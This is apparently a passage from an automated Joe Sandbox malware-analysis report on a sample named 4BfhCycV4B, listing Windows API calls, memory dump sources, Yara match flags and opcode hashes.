                                                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,0421BAAD,00000000,?,00000008,?,?,04223896,00000000), ref: 0421BCDF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
                                                                                                                                                                                                                                                                                        • Instruction ID: 1162ccd5f834d0ad7ef49f48cc4747a402a14773fd4cb9f6bd18ae73d0f413ba
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50B106316206099FD719CF28C48AB657FF0EF55364F298658E89ACF2A1C735FA91CB40
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004206F2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1663032902-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                                                                        • Instruction ID: 9cee96005927a1573ed79b1b6da19a4e5e72af736dd4be10e0bf17a0e1069c17
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7421A472610226ABDB249A25EC41BBB77E8EB80314F50017FFD05D6242EB79ED44CB59
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FDF
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FEC
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 04220959
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1663032902-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                                                                        • Instruction ID: 0230e437f089e8114178956fbe31e12154cc09fc18e699c0e8a6ede9f8e37206
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59218372B21226EBFB24AF24DD41BBA73ACEB44714F1001BAEF06D6150EB75B944CB54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0042044E,00000001,00000000,?,042145A4,?,04220CE2,00000000,?,?,?), ref: 042205FF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                                                                        • Instruction ID: 4d80bed135c7d7fe63ba070a14b56e44010022ff8f4f861d05ad158c5ef501e5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF1129367103129FDB189F39D8A467AB791FF84358B18442DDA8687A40D7757542CB40
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042066C,00000000,00000000,?), ref: 004208FA
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2692324296-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                                                                        • Instruction ID: 95b118f29787940bb019709f183f2c3e5714f1a92d3f33ac24e0601bbd6709b7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03F04E727001257FEB245B1598057BB77A8DB40314F51442AEC47A3242DA38BD81C5D4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,042208D3,00000000,00000000,?), ref: 04220B61
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2692324296-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                                                                        • Instruction ID: 597623751da03b5351dded9ab6284780fe1ef376da17e8897c5fff14d4f10eee
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3CF0F432B20127BFDB385A648909BBE7768EB4076CF050569EE05A3140EA74BE41CAD4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FDF
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FEC
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 04220959
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1663032902-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a5e2e27661e3b7b444401f33bbcec4a2cbcde23cc4fdcda85679ab9cc1de8dfe
                                                                                                                                                                                                                                                                                        • Instruction ID: bea8e67f34b459fe8ca7dabc8046b25e866a1fe30cacf0c488b329f10c28081d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5e2e27661e3b7b444401f33bbcec4a2cbcde23cc4fdcda85679ab9cc1de8dfe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27F0F432B21119ABEB14AB64DC41ABA33ACDB48324F1001BAEB07D7240DA747D05C794
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0042069E,00000001,?,?,042145A4,?,04220CA6,042145A4,?,?,?,?,?,042145A4,?,?), ref: 04220674
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,04214002,?,00000004), ref: 0421779E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00411A06: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,004395B8,00000008,00416B87,?,?,?), ref: 00411A15
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(004170AB,00000001,00439638,0000000C), ref: 00417129
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04211C6D: RtlEnterCriticalSection.NTDLL(?), ref: 04211C7C
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(004170AB,00000001,00439638,0000000C), ref: 04217390
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00420232,00000001,?,?,?,00420A9D,=CA,?,?,?,?,?,0041433D,?,?,?), ref: 00420312
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00420232,00000001,?,?,?,04220D04,042145A4,?,?,?,?,?,042145A4,?,?,?), ref: 04220579
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00409C12,042095DF), ref: 04209E72
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
